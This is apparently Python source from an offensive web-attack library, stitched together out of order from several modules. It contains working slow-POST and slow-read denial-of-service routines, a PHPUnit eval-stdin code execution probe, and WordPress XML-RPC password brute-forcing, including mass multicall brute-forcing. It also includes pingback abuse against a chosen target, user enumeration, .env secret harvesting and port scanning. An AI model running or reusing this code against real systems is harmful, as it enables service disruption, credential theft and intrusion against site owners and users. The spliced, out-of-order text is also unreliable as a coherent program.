def slow_post_test(u,port=80,logs=True,timeout=5,size=10000,duration=180,randomly=False,wait=1,min_wait=1,max_wait=5):
 i=0
 if logs==True:
  print("[*]Test has started:\nTarget: {}\nPort: {}\nData length to post: {}\nInitial connection timeout:{}\nTest duration: {} seconds".format(u,port,size,timeout,duration))
 try:
  s=build_post(u,port,timeout=timeout,size=size)
  i+=1
 except Exception as e:
  if logs==True:
   print("[-]Connection failed")
  return 0
 j=0
 if i>0:
  t=time.time()
  while True:
   if int(time.time()-t)>=duration:
    if logs==True:
     print("[+]Maximum time has been reached!!!\n==>Size: {}\n==>Time: {}".format(j,int(time.time()-t)))
    return int(time.time()-t)
   if j==size:
    if logs==True:
     print("[+]Maximum size has been reached!!!\n==>Size: {}\n==>Time: {}".format(j,int(time.time()-t)))
    return int(time.time()-t)
   try:
    h=random.choice(lis)
    s.send(h.encode("utf-8"))
    j+=1
    if logs==True:
     print("Posted: {}".format(h))
    if randomly==True:
     time.sleep(random.randint(min_wait,max_wait))
    if randomly==False:
     try:
      time.sleep(wait)
     except KeyboardInterrupt:
      if logs==True:
       print("[-]Cant send more\n==>Size: {}\n==>Time:{}".format(j,int(time.time()-t)))
      return int(time.time()-t)
   except Exception as e:
    if logs==True:
     print("[-]Cant send more\n==>Size: {}\n==>Time:{}".format(j,int(time.time()-t)))
    return int(time.time()-t)

def slow_read_test(u,port=80,logs=True,timeout=5,duration=180,randomly=False,wait=5,min_wait=1,max_wait=10):
  i=0
  if logs==True:
   print("[*]Test has started:\nTarget: {}\nPort: {}\nInitial connection timeout: {}\nTest duration: {} seconds".format(u,port,timeout,duration))
  ti=time.time()
  try: 
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.settimeout(timeout)
    s.connect((u,port))
    if ((port==443 ) or (port==8443)):
     s=ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
    while True:
     if time.time()-ti>=duration:
      if logs==True:
       print("[+]Maximum time has been reached!!!")
      return int(time.time()-ti)
     pa=random.choice(paths)
     try:
      g=random.randint(1,2)
      if g==1:
       s.send("GET {} HTTP/1.1\r\nUser-Agent: {}\r\nAccept-language: en-US,en,q=0.5\r\nConnection: keep-alive\r\nKeep-Alive: {}\r\nHost: {}\r\n\r\n".format(pa,random.choice(ua),random.randint(300,1000),u).encode("utf-8"))
      else:
       q='q='
       for i in range(10,random.randint(20,50)):
        q+=random.choice(lis)
       s.send("POST {} HTTP/1.1\r\nUser-Agent: {}\r\nAccept-language: en-US,en,q=0.5\r\nConnection: keep-alive\r\nKeep-Alive: {}\r\nContent-Length: {}\r\nContent-Type: application/x-www-form-urlencoded\r\nHost: {}\r\n\r\n{}".format(pa,random.choice(ua),random.randint(300,1000),len(q),u,q).encode("utf-8"))
      d=s.recv(random.randint(1,3))
      if logs==True:
       print("Received: {}".format(str(d.decode('utf-8'))))
      print("sleeping...")
      if randomly==True:
       time.sleep(random.randint(min_wait,max_wait))
      if randomly==False:
       time.sleep(wait)
     except:
      break
    s.close()
  except Exception as e:
    pass
  if logs==True:
   print("==>connection closed at: {} seconds".format(int(time.time()-ti)))
  return int(time.time()-ti)

"""

def adb_exploit(u,timeout=5,p=5555):
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        s.connect((u,p))
        s.send(b"CNXN\x00\x00\x00\x01\x00\x10\x00\x00\x07\x00\x00\x00\x32\x02\x00\x00\xbc\xb1\xa7\xb1host::\x00") 
        c=s.recv(4096)
        s.close()
        if "CNXN" in str(c):
            return True
    except:
        pass
    return False



def exposed_telnet(u,p=23,timeout=5):
 try:
  t=xtelnet.session()
  t.connect(u,p=p,timeout=timeout)
  t.destroy()
  return True
 except:
  pass
 return False



def exposed_env(u,user_agent=None,cookie=None,proxies=None,proxy=None,path="",brute_force=True,timeout=15):
 if brute_force==False:
  if user_agent:
   us=user_agent
  else:
   us=random.choice(ua)
  if cookie:
    hea={'User-Agent': us,'Cookie':cookie}
  else:
   hea={'User-Agent': us}
  if proxy:
   proxy={'http':'http://'+proxy,'https':'http://'+proxy}
  try:
   if urlparse(u).path=="/":
    u+=path+'.env'
   elif len(urlparse(u).path)<1:
    u+=path+'/.env'
   else:
    u=u.replace(urlparse(u).path,path+'/.env')
   c=requests.get(u,headers = hea,proxies=proxy,timeout=timeout, verify=False).text
   if ("APP_KEY=" in c) or ("DB_HOST=" in c):
    return (True,u)
  except:
   pass
  return (False,'')
 else:
  for x in env_paths:
   if proxy:
    proxy=proxy
   if proxies:
    proxy=random.choice(proxies)
   a=exposed_env(u,user_agent=user_agent,cookie=cookie,proxy=proxy,path=x,timeout=timeout)
   if a[0]==True:
    return a
  return (False,'')


def vulners_search(software,file_name="",max_vulnerabilities=100,version="",software_type="software",user_agent=None,cookie=None,proxies=None,proxy=None,timeout=20):
  if not file_name:
   if version:
    file_name=software+"-"+version.replace('.','-')
   else:
    file_name=software
  if user_agent:
   us=user_agent
  else:
   us=random.choice(ua)
  if cookie:
    hea={'User-Agent': us,'Cookie':cookie}
  else:
   hea={'User-Agent': us}
  if proxy:
   proxy={'http':'http://'+proxy,'https':'http://'+proxy}
  try:
   ver=""
   if version:
    ver=version
   max_vuln=100
   if max_vulnerabilities:
    max_vuln=max_vulnerabilities
   ty="software"
   if software_type:
    ty=software_type
   if ty not in ["software","cpe"]:
    raise Exception('type must be: "software" or "cpe"')
   d={"maxVulnerabilities":max_vuln,"version":ver,"type":ty,"software":software}
   r=requests.get("https://vulners.com/api/v3/burp/software/",params=d,headers = hea,proxies=proxy,timeout=timeout, verify=False)
   c=json.loads(r.text)
   if c["result"]=="OK":
    with open(file_name.split('.')[0]+".json", 'w') as outfile:
     json.dump(c, outfile, indent=4)
    outfile.close()
    l={}
    m= c["data"]["search"]
    i=0
    for x in m:
     l.update({x["_source"]["description"].encode("utf-8","ignore"):x["_source"]["cvss"]})
     i+=1
    return l
  except:
   pass
  return {}

def shodan_report(ip,api_key,file_name="shodan_report"):
 u="https://api.shodan.io/shodan/host/{}?key={}".format(ip,api_key)
 try:
  r=requests.get(u,headers={"User-Agent":random.choice(ua)}).text
  with open(file_name.split('.')[0]+".json", 'w') as outfile:
     json.dump(json.loads(r), outfile, indent=4)
  outfile.close() 
  return json.loads(r)
 except:
  return {}

def phpunit_exploit(u,path='/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php',user_agent=None,cookie=None,timeout=10,proxy=None):
 if proxy:
  proxy={'http':'http://'+proxy,'https':'http://'+proxy}
 if u[len(u)-1]=='/':
  u=u[0:len(u)-1]
 if user_agent:
  us=user_agent
 else:
  us=random.choice(ua)
 hed={"User-Agent":us}
 if cookie:
  hed.update({"Cookie":cookie})
 try:
  r=requests.post(u+path,data="<?php echo 'This_is_vulnerable_site';?>",headers=hed,proxies=proxy,timeout=timeout, verify=False).text
  if 'This_is_vulnerable_site' in r:
   return True
 except:
  pass
 return False


import requests,random,json,sys
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
from bane.payloads import ua
if  sys.version_info < (3,0):
 from urlparse import urlparse
else:
 from urllib.parse import urlparse

def wp_xmlrpc_methods(u,user_agent=None,cookie=None,path='/xmlrpc.php',timeout=10,proxy=None):
 if proxy:
  proxy={'http':'http://'+proxy,'https':'http://'+proxy}
 if u[len(u)-1]=='/':
  u=u[0:len(u)-1]
 if user_agent:
  us=user_agent
 else:
  us=random.choice(ua)
 hed={"User-Agent":us}
 if cookie:
  hed.update({"Cookie":cookie})
 u+=path
 post ="""
 <?xml version="1.0" encoding="utf-8"?> 
<methodCall> 
<methodName>system.listMethods</methodName> 
<params></params> 
</methodCall>
"""
 try:
  r = requests.post(u, data=post,headers = hed,proxies=proxy,timeout=timeout, verify=False)
  return [ x.replace('</string></value>','').replace('<value><string>','').strip() for x in r.text.split('<data>')[1].split('</data>')[0].strip().split('\n')]
 except:
  pass
 return []


def wp_xmlrpc_bruteforce(u,user_agent=None,cookie=None,path='/xmlrpc.php',timeout=10,proxy=None):
 if proxy:
  proxy={'http':'http://'+proxy,'https':'http://'+proxy}
 if u[len(u)-1]=='/':
  u=u[0:len(u)-1]
 if user_agent:
  us=user_agent
 else:
  us=random.choice(ua)
 hed={"User-Agent":us}
 if cookie:
  hed.update({"Cookie":cookie})
 u+=path
 post ="""
 <?xml version="1.0" encoding="utf-8"?> 
<methodCall> 
<methodName>system.listMethods</methodName> 
<params></params> 
</methodCall>
"""
 try:
  r = requests.post(u, data=post,headers = hed,proxies=proxy,timeout=timeout, verify=False)
  if "wp.getUsersBlogs" in [ x.replace('</string></value>','').replace('<value><string>','').strip() for x in r.text.split('<data>')[1].split('</data>')[0].strip().split('\n')]:
   return True
 except:
  pass
 return False
 

def wp_xmlrpc_mass_bruteforce(u,user_agent=None,cookie=None,path='/xmlrpc.php',timeout=10,proxy=None):
 if proxy:
  proxy={'http':'http://'+proxy,'https':'http://'+proxy}
 if u[len(u)-1]=='/':
  u=u[0:len(u)-1]
 if user_agent:
  us=user_agent
 else:
  us=random.choice(ua)
 hed={"User-Agent":us}
 if cookie:
  hed.update({"Cookie":cookie})
 u+=path
 post ="""
 <?xml version="1.0" encoding="utf-8"?> 
<methodCall> 
<methodName>system.listMethods</methodName> 
<params></params> 
</methodCall>
"""
 try:
  r = requests.post(u, data=post,headers = hed,proxies=proxy,timeout=timeout, verify=False)
  l=[ x.replace('</string></value>','').replace('<value><string>','').strip() for x in r.text.split('<data>')[1].split('</data>')[0].strip().split('\n')]
  if ("wp.getUsersBlogs" in l) and ("system.multicall" in l):
   return True
 except:
  pass
 return False

def wp_xmlrpc_pingback(u,user_agent=None,test_url="https://www.google.com/",cookie=None,path='/xmlrpc.php',timeout=10,proxy=None):
 if proxy:
  proxy={'http':'http://'+proxy,'https':'http://'+proxy}
 if u[len(u)-1]=='/':
  u=u[0:len(u)-1]
 if user_agent:
  us=user_agent
 else:
  us=random.choice(ua)
 hed={"User-Agent":us}
 if cookie:
  hed.update({"Cookie":cookie})
 u+=path
 post ="""
 <?xml version="1.0" encoding="utf-8"?> 
<methodCall> 
<methodName>system.listMethods</methodName> 
<params></params> 
</methodCall>
"""
 try:
  r = requests.post(u, data=post,headers = hed,proxies=proxy,timeout=timeout, verify=False)
  l=[ x.replace('</string></value>','').replace('<value><string>','').strip() for x in r.text.split('<data>')[1].split('</data>')[0].strip().split('\n')]
  if "pingback.ping" in l:
   return True
 except:
  pass
 return False


def wp_xmlrpc_pingback_exploit(u,user_agent=None,target_url="https://www.google.com/",cookie=None,path='/xmlrpc.php',timeout=10,proxy=None):
 url=u.split('://')[0]+"://"+urlparse(u).netloc
 if proxy:
  proxy={'http':'http://'+proxy,'https':'http://'+proxy}
 if user_agent:
  us=user_agent
 else:
  us=random.choice(ua)
 hed={"User-Agent":us}
 if cookie:
  hed.update({"Cookie":cookie})
 url+=path
 post ="""<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>"""+target_url+"""</string></value>
</param>
<param>
<value><string>"""+u+"""</string></value>
</param>
</params>
</methodCall>
"""
 try:
  r = requests.post(url, data=post,headers = hed,proxies=proxy,timeout=timeout, verify=False)
 except:
  pass



def wpadmin(u,username,password,user_agent=None,cookie=None,path='/xmlrpc.php',timeout=10,proxy=None):
 '''
   this function is to check the wordpress given logins using the xmlrpc.php file. if they are correct it returns True, else False
'''
 if proxy:
  proxy={'http':'http://'+proxy,'https':'http://'+proxy}
 if u[len(u)-1]=='/':
  u=u[0:len(u)-1]
 if user_agent:
  us=user_agent
 else:
  us=random.choice(ua)
 hed={"User-Agent":us}
 if cookie:
  hed.update({"Cookie":cookie})
 u+=path
 post ="""<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>{}</value></param>
<param><value>{}</value></param>
</params>
</methodCall>""".format(username,password)
 try:
  r = requests.post(u, data=post,headers = hed,proxies=proxy,timeout=timeout, verify=False)
  if "isAdmin" in r.text:
   return True
 except:
  pass
 return False

def wpadmin_mass(u,word_list=[],user_agent=None,cookie=None,path='/xmlrpc.php',timeout=10,proxy=None):
 '''
   this function is to check the wordpress given logins using the xmlrpc.php file. if they are correct it returns True, else False
'''
 if proxy:
  proxy={'http':'http://'+proxy,'https':'http://'+proxy}
 if u[len(u)-1]=='/':
  u=u[0:len(u)-1]
 if user_agent:
  us=user_agent
 else:
  us=random.choice(ua)
 hed={"User-Agent":us}
 if cookie:
  hed.update({"Cookie":cookie})
 u+=path
 post="""
 <?xml version="1.0"?>
<methodCall><methodName>system.multicall</methodName><params><param><value><array><data>
 """
 for x in word_list:
  post +="""<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array>
  <data><value><array><data><value><string>{}</string></value><value><string>{}</string></value>
  </data></array></value></data></array></value></member></struct></value>
""".format(x.split(':')[0],x.split(':')[1])
 post+="""
</data></array></value></param></params></methodCall>
 """
 try:
  r = requests.post(u, data=post,headers = hed,proxies=proxy,timeout=timeout, verify=False)
  l=r.text.split('<array><data>')[1].split('</array></data>')[0].strip().split("</struct></value>")
  for x in l:
   if "Incorrect username or password" not in x:
    return word_list[l.index(x)]
 except:
  pass
 return ""


def wp_users(u,path='/wp-json/wp/v2/users',timeout=10,user_agent=None,cookie=None,proxy=None):
 '''
   this function is to get WP users
'''
 if user_agent:
  us=user_agent
 else:
  us=random.choice(ua)
 hed={"User-Agent":us}
 if cookie:
  hed.update({"Cookie":cookie})
 if proxy:
  proxy={'http':'http://'+proxy,'https':'http://'+proxy}
 if u[len(u)-1]=='/':
  u=u[0:len(u)-1]
 u+=path
 try:
  r=requests.get(u, headers = hed,proxies=proxy,timeout=timeout, verify=False)
  if ('{"id":'in r.text) and('"name":"' in r.text):
   a= json.loads(r.text)
   users=[]
   for x in range(len(a)):
    users.append({'id':a[x]['id'],'slug':a[x]['slug'],'name':a[x]['name']})
   return users
 except Exception as e:
  pass

def wp_user(u,path='/wp-json/wp/v2/users/',user=1,user_agent=None,cookie=None,timeout=10,proxy=None):
 '''
   this function is to return all informations about a WP user with a given index integer
'''
 if user_agent:
  us=user_agent
 else:
  us=random.choice(ua)
 hed={"User-Agent":us}
 if cookie:
  hed.update({"Cookie":cookie})
 if proxy:
  proxy={'http':'http://'+proxy,'https':'http://'+proxy}
 if u[len(u)-1]=='/':
  u=u[0:len(u)-1]
 u+=path+str(user)
 try:
  r=requests.get(u, headers = hed,proxies=proxy,timeout=timeout, verify=False)
  if ('{"id":'in r.text) and('"name":"' in r.text):
   return json.loads(r.text)
 except Exception as e:
  pass
 

def wp_users_enumeration(u,path='/',timeout=15,user_agent=None,cookie=None,proxy=None,start=1,end=20,logs=True):
 if user_agent:
  us=user_agent
 else:
  us=random.choice(ua)
 hed={"User-Agent":us}
 if cookie:
  hed.update({"Cookie":cookie})
 d=u.split('://')[1].split("/")[0]
 u=u.split(d)[0]+d
 if proxy:
  proxy={'http':'http://'+proxy,'https':'http://'+proxy}
 l=[]
 for x in range(start,end+1):
  try:
      r=requests.get(u+path+"?author="+str(x),headers = hed,proxies=proxy,timeout=timeout, verify=False).text
      a=r.split('<meta property="og:title" content="')[1].split('>')[0]
      if ',' in a:
       a=a.split(',')[0]
       l.append((x,a))
       if logs==True:
          print("[+]Username found: {} | ID: {}".format(a.encode("utf-8","replace"),x))
  except KeyboardInterrupt:
      break
  except:
      pass
 return l

def wp_version(u,timeout=15,user_agent=None,cookie=None,proxy=None):
 if user_agent:
  us=user_agent
 else:
  us=random.choice(ua)
 hed={"User-Agent":us}
 if cookie:
  hed.update({"Cookie":cookie})
 if proxy:
  proxy={'http':'http://'+proxy,'https':'http://'+proxy}
 try:
  r=requests.get(u,headers = hed,proxies=proxy,timeout=timeout, verify=False).text
  return r.split('<meta name="generator" content="')[1].split('"')[0].strip().split(' ')[1]
 except:
  pass



import requests,urllib,socket,random,time,re,threading,sys,json,os,xtelnet
import bs4
from bs4 import BeautifulSoup
from bane.payloads import *
if  sys.version_info < (3,0):
    from scapy.config import conf
    conf.ipv6_enabled = False
    from scapy.all import *
else:
    from kamene.config import conf
    conf.ipv6_enabled = False
    from kamene.all import *
if os.path.isdir('/data/data/com.termux/')==False:
    import dns.resolver

def remove_html_tags(text):
    """Remove html tags from a string"""
    clean = re.compile('<.*?>')
    return re.sub(clean, '', text)


def get_banner(u,p=23,timeout=3,payload=None):
 try:
  return xtelnet.get_banner(u,p=p,timeout=timeout,payload=payload)
 except:
  return None


def info(u,timeout=10,proxy=None,logs=False,returning=True):
 '''
   this function fetchs all informations about the given ip or domain using check-host.net and returns them to the use as string
   with this format:
   'requested information: result'
    
   it takes 2 arguments:
   
   u: ip or domain
   timeout: (set by default to: 10) timeout flag for the request
   usage:
   >>>import bane
   >>>domain='www.google.com'
   >>>bane.info(domain)
'''
 if proxy:
  proxy={'http':'http://'+proxy,'https':'http://'+proxy}
 try:
  h=''
  u='https://check-host.net/ip-info?host='+u
  c=requests.get(u, headers = {'User-Agent': random.choice(ua)},proxies=proxy,timeout=timeout).text
  soup = BeautifulSoup(c,"html.parser")
  la=soup.find_all('a')
  l=[]
  for i in la:
   if "#ip_info-dbip" in str(i):
    l.append(remove_html_tags(str(i)).strip().replace('\n',' '))
   if "#ip_info-ip2location" in str(i):
    l.append(remove_html_tags(str(i)).strip().replace('\n',' '))
   if "#ip_info-geolite2" in str(i):
    l.append(remove_html_tags(str(i)).strip().replace('\n',' '))
  p=soup.find_all('table')
  o=0
  di={}
  for x in p:
   try:
    do={}
    y=x.find_all('tr')
    for w in y:
     a=w.find_all('td')
     try:
      c=str(a[0]).split('<td>')[1].split('</td>')[0].strip()
      d=str(a[1]).split('<td>')[1].split('</td>')[0].strip()
      d=remove_html_tags(d).strip().replace('\n',' ')
      do.update({c:d})
     except:
      pass
    di.update({l[o]:do})
    o+=1
   except:
    pass
  if logs==True:
   for x in di:
    print (x)
    print('')
    for y in di[x]:
     print(y+": "+di[x][y])
    print('')
  if returning==True:
   return di
 except:
  return None

def norton_rate(u,timeout=30,proxy=None):
 '''
   this function takes any giving and gives a security report from: safeweb.norton.com, if it is a: spam domain, contains a malware...
   it takes 3 arguments:
   u: the link to check
   logs: (set by default to: True) showing the process and the report, you can turn it off by setting it to:False
   returning: (set by default to: False) returning the report as a string format if it is set to: True.
   usage:
   >>>import bane
   >>>url='http://www.example.com'
   >>>bane.norton_rate(domain)
'''
 if proxy:
  proxy={'http':'http://'+proxy,'https':'http://'+proxy}
 try:
  ur=urllib.quote(u, safe='')
  ul='https://safeweb.norton.com/report/show?url='+ur
  c=requests.get(ul, headers = {'User-Agent': random.choice(ua)},proxies=proxy,timeout=timeout).text 
  soup = BeautifulSoup(c, "html.parser")
  s=soup.find_all('div', class_="communityRatings")
  s=remove_html_tags(str(s[0])).strip().split("\n")
  while("" in s) : 
    s.remove("") 
  try:
   return {"Profile":s[0],"Rate":float(s[1]),"By":s[2]}
  except:
   return {"Profile":s[0],"Rate":float(s[1])}
 except:
  pass

def myip(proxy=None,proxy_type=None,timeout=15):
 '''
   this function is for getting your ip using: ipinfo.io
   usage:
   >>>import bane
   >>>bane.myip()
   xxx.xx.xxx.xxx
'''
 proxies={}
 if proxy:
  if proxy_type.lower()=="http":
   proxies = {
     "http": "http://"+proxy,
     }
  if proxy_type.lower()=="socks4":
   proxies = {
     "http": "socks4://"+proxy,
      }
  if proxy_type.lower()=="socks5":
   proxies = {
     "http": "socks5://"+proxy,
      } 
 try:
   return requests.get("http://ipinfo.io/ip",headers = {'User-Agent': random.choice(ua)},  proxies=proxies ,timeout=timeout).text.strip()
 except:
  pass
 return ''

def whois(u):
 try:
  r=requests.post('https://check-host.net/ip-info/whois',data={'host':u})
  a=r.text.split('\n\n')[0] 
  b=a.split('\n')
  d={} 
  for x in b:
    d.update({x.split(':')[0].strip():x.replace(x.split(':')[0].strip(),'').strip()[1:].strip()})
  return d
 except:
  pass
 return {}

def geoip(u,timeout=15,proxy=None):
 '''
   this function is for getting: geoip informations
 '''
 try:
   if proxy:
    proxy={'http':'http://'+proxy,'https':'http://'+proxy}
   r=requests.get('https://geoip-db.com/jsonp/'+u,headers = {'User-Agent': random.choice(ua)},proxies=proxy,timeout=timeout).text
   return json.loads(r.split('(')[1].split(')')[0])
 except:
  pass
 return {}

def http_options(u,timeout=10,user_agent=None,cookie=None,extra_headers=None,logs=True,returning=False,proxy=None):
 if user_agent:
   us=user_agent
 else:
   us=random.choice(ua)
 if cookie:
    heads={'User-Agent': us,'Cookie':cookie}
 else:
   heads={'User-Agent': us}
 if extra_headers:
  heads.update(extra_headers)
 try:
   if proxy:
    proxy={'http':'http://'+proxy,'https':'http://'+proxy}
   s=requests.session()
   a=s.options(u,headers = heads ,proxies=proxy,timeout=timeout).headers
 except Exception as ex:
   return []
 b=[]
 if 'Access-Control-Allow-Methods' in a:
  b+=[ x.strip() for x in a['Access-Control-Allow-Methods'].split(',')]
 if 'Allow' in a:
  b+=[ x.strip() for x in a['Allow'].split(',')]
 return b

def headers(u,timeout=10,user_agent=None,cookie=None,extra_headers=None,logs=True,returning=False,proxy=None):
 if user_agent:
   us=user_agent
 else:
   us=random.choice(ua)
 if cookie:
    heads={'User-Agent': us,'Cookie':cookie}
 else:
   heads={'User-Agent': us}
 if extra_headers:
  heads.update(extra_headers)
 try:
   if proxy:
    proxy={'http':'http://'+proxy,'https':'http://'+proxy}
   s=requests.session()
   a=s.get(u,headers = heads ,proxies=proxy,timeout=timeout).headers
 except Exception as ex:
   return None
 if logs==True:
  for x in a:
   print("{} : {}".format(x,a[x]))
 if returning==True:
  return a


def reverse_ip_lookup(u,timeout=10,logs=True,returning=False,proxy=None):
 '''
   this function is for: reverse ip look up
   if you've used it 100 times in 24 hours, your IP will be banned by "api.hackertarget.com" so i highly recommand you to use the "proxy" option by adding a http(s) proxy:

   bane.reverse_ip_lookup('XXX.XXX.XXX.XXX',proxy='IP:PORT')

 '''
 if proxy:
  proxy={'http':'http://'+proxy,'https':'http://'+proxy}
 try:
   r=requests.get("https://api.hackertarget.com/reverseiplookup/?q="+u,headers = {'User-Agent': random.choice(ua)} ,proxies=proxy,timeout=timeout).text
   return r.split('\n')
 except Exception as ex:
   pass
 return []
'''
   end of the information gathering functions using: api.hackertarget.com
'''


def resolve(u,server='8.8.8.8',timeout=1,lifetime=1):
 o=[]
 r = dns.resolver.Resolver()
 r.timeout = timeout
 r.lifetime = lifetime
 r.nameservers = [server]
 a = r.query(u)
 for x in a:
  o.append(str(x))
 return o
"""
this class is used to scan a target for open ports

usage:

a=bane.port_scan("8.8.8.8",ports=[21,22,23,80,443,3306],timeout=5)
print(a.result)

this should give you a dict like this:

{'443': 'Open', '22': 'Closed', '21': 'Closed', '23': 'Closed', '80': 'Closed', '3306': 'Closed'}

"""

def get_local_ip():
 try:
  return [l for l in ([ip for ip in socket.gethostbyname_ex(socket.gethostname())[2] if not ip.startswith("127.")][:1], [[(s.connect(('8.8.8.8', 53)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]]) if l][0][0]
 except:
  return '127.0.0.1'

def host_alive(target):
 if os.name == 'nt':
  r = os.popen("ping -n 1 "+target).readlines() 
 else:
  r = os.popen("ping -c 1 "+target).readlines() 
 if "TTL" in str(r):
  r=None
  return True
 r=None
 return False


def tcp_scan(ip,port=1,timeout=2,retry=1,check_open=False):
    syn = IP(dst=ip) / TCP(dport=port, flags="S")
    ans, unans = sr(syn, timeout=timeout,retry=retry,verbose=0)
    for sent, received in ans:
        if check_open==True:
         if received[TCP].flags == "SA":
          return True
         else:
          return False
        if received[TCP].flags == "RA" or received[TCP].flags == "SA":
            return True
    return False


class port_scan:
 __slots__=["timeout","por","result","target","retry"]
 
 def scan (self):
        p=self.por[self.flag2]
        a= tcp_scan(self.target,port=int(p),check_open=True,timeout=self.timeout,retry=self.retry)
        if a==True:
         self.result.update({p:1})
        else:
         self.result.update({p:0})
         
 def __init__(self,u,ports=[21,22,23,25,43,53,80,443,2082,3306],threads_daemon=True,timeout=2,retry=0):
  try:
   thr=[]
   self.retry=retry
   self.result={}
   self.timeout=timeout
   self.por=ports
   self.target=u
   for x in range(len(self.por)):
    self.flag2=x
    t=threading.Thread(target=self.scan)
    t.daemon=threads_daemon
    t.start()
    thr.append(t)
    time.sleep(.001)
   while(len(self.result)!=len(ports)):
    time.sleep(.1)
  except:
      pass
  for x in self.__dict__:
   if x!="result":
    self.__dict__[x]=None


def subdomains_crt(domain,timeout=120,user_agent=None,proxy=None):
 if user_agent:
  us=user_agent
 else:
  us=random.choice(ua)
 if proxy:
  proxy={'http':'http://'+proxy,'https':'http://'+proxy}
 if "://" in domain:
  domain=domain.split("://")[1].split('/')[0]
 if "www." in domain:
  domain=domain.replace('www.','')
 try:
  r=requests.get('https://crt.sh/?output=json&q=%25.'+domain,headers = {"User-Agent":us},proxies=proxy,timeout=timeout, verify=False).json()
  a= [ x["name_value"].split('\\')[0] for x in r if ("*." not in x["name_value"])]
  l= []
  for x in a:
   if "\n" in x:
     l+=x.split("\n")
   else:
     l.append(x)
  return list(dict.fromkeys(l))
 except:
  return [] 


def subdomains_finder(u,process_check_interval=5,logs=True,requests_timeout=15,https=False):
  https_flag=0
  if (https==True) or('https://' in u):
     https_flag=1
  if "://" in u:
   host=u.split('://')[1].split('/')[0]
  else:
   host=u
  sd=[]
  while True:
   try:
    s=requests.session()
    r=s.post('https://scan.penteston.com/scan_system.php',data={"scan_method":"S201","test_protocol":https_flag,"test_host":host},timeout=requests_timeout).text
    if '"isFinished":"no"' not in r:
     if logs==True:
      print("\n[+]Scan results:")
     c=r.split('strong><br\/>')[1].replace('"}','')
     for x in (c.split('<br\/>')):
      if logs==True:
       print(x)
      sd.append(x)
     break
    else:
     if logs==True:
      sys.stdout.write("\r[*]Scan in progress...")
      sys.stdout.flush()
     #print("[*]Scan in progress...")
   except KeyboardInterrupt:
      break
   except:
    pass
   try:
    time.sleep(process_check_interval)
   except KeyboardInterrupt:
       break
   except:
    pass
  return {u:sd}